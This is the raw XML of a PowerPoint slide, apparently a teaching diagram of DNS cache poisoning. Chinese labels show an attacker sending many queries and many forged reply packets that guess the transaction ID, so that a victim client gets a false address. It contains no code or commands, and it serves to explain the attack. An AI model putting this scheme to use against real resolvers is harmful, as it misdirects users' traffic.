          <p:cNvPr id="522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335756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2924175"/>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Box 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5803900" y="3933825"/>
            <a:ext cx="1216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2231" name="TextBox 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4294188" y="6308725"/>
            <a:ext cx="1211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受害客户端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2232" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-270262">
            <a:off x="1423988" y="3441700"/>
            <a:ext cx="4519612" cy="684213"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 43220595 w 3408218"/>
              <a:gd name="T1" fmla="*/ 4903784 h 498763"/>
              <a:gd name="T2" fmla="*/ 21836204 w 3408218"/>
              <a:gd name="T3" fmla="*/ 7764298 h 498763"/>
              <a:gd name="T4" fmla="*/ 0 w 3408218"/>
              <a:gd name="T5" fmla="*/ 0 h 498763"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 3408218"/>
              <a:gd name="T10" fmla="*/ 0 h 498763"/>
              <a:gd name="T11" fmla="*/ 3408218 w 3408218"/>
              <a:gd name="T12" fmla="*/ 498763 h 498763"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="3408218" h="498763">
                <a:moveTo>
                  <a:pt x="3408218" y="285008"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2849088" y="391885"/>
                  <a:pt x="2289958" y="498763"/>
                  <a:pt x="1721922" y="451262"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1153886" y="403761"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd type="triangl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33" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1619250" y="2420938"/>
            <a:ext cx="4176713" cy="792162"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3313215"/>
              <a:gd name="T1" fmla="*/ 11005638 h 455220"/>
              <a:gd name="T2" fmla="*/ 13749088 w 3313215"/>
              <a:gd name="T3" fmla="*/ 9267914 h 455220"/>
              <a:gd name="T4" fmla="*/ 26638810 w 3313215"/>
              <a:gd name="T5" fmla="*/ 66612920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headEnd type="triangl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34" name="TextBox 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="3573463"/>
            <a:ext cx="4176712"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www.example.org=1.1.1.1 ID=xxxx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>大量猜测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的伪造应答数据包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5223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6100" y="530066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TextBox 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="4005263"/>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zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52237" name="TextBox 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2051050" y="2492375"/>
            <a:ext cx="3241675"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①www.example.org?ID=xxxx</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黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>发出大量查询</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2238" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076825" y="3860800"/>
            <a:ext cx="1079500" cy="1584325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 573206"/>
              <a:gd name="T1" fmla="*/ 7876225 h 1296537"/>
              <a:gd name="T2" fmla="*/ 52870289 w 573206"/>
              <a:gd name="T3" fmla="*/ 3979576 h 1296537"/>
              <a:gd name="T4" fmla="*/ 170811535 w 573206"/>
              <a:gd name="T5" fmla="*/ 0 h 1296537"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 573206"/>
              <a:gd name="T10" fmla="*/ 0 h 1296537"/>
              <a:gd name="T11" fmla="*/ 573206 w 573206"/>
              <a:gd name="T12" fmla="*/ 1296537 h 1296537"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="573206" h="1296537">
                <a:moveTo>
                  <a:pt x="0" y="1296537"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="40943" y="1083860"/>
                  <a:pt x="81887" y="871183"/>
                  <a:pt x="177421" y="655093"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="272955" y="439004"/>
                  <a:pt x="573206" y="0"/>
                  <a:pt x="573206"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39" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5435600" y="3644900"/>
            <a:ext cx="2016125" cy="2376488"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 47881126 w 1282890"/>
              <a:gd name="T1" fmla="*/ 0 h 2210937"/>
              <a:gd name="T2" fmla="*/ 67033514 w 1282890"/>
              <a:gd name="T3" fmla="*/ 2692358 h 2210937"/>
              <a:gd name="T4" fmla="*/ 0 w 1282890"/>
              <a:gd name="T5" fmla="*/ 4234578 h 2210937"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1282890"/>
              <a:gd name="T10" fmla="*/ 0 h 2210937"/>
              <a:gd name="T11" fmla="*/ 1282890 w 1282890"/>
              <a:gd name="T12" fmla="*/ 2210937 h 2210937"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1282890" h="2210937">
                <a:moveTo>
                  <a:pt x="818866" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1050878" y="518615"/>
                  <a:pt x="1282890" y="1037230"/>
                  <a:pt x="1146412" y="1405719"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1009934" y="1774209"/>
                  <a:pt x="0" y="2210937"/>
                  <a:pt x="0" y="2210937"/>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40" name="TextBox 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="4652963"/>
            <a:ext cx="2232025" cy="338137"/>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③ www.example.org?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52241" name="TextBox 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364163" y="5445125"/>
            <a:ext cx="3240087" cy="33813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④ www.example.org=1.1.1.1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">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p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52228"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52228"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52228"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="52229"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52229"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52229"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52229"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="52235"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52235"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52235"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52235"/>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52230"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52230"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52230"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52230"/>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2231"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52231"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52231"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5223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2236"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52236"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52236"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5223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2233"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52233"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="52237"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52237"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52237"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52237"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52237"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="522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52232"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52232"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="54" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="52234"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52234"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52234"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52234"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
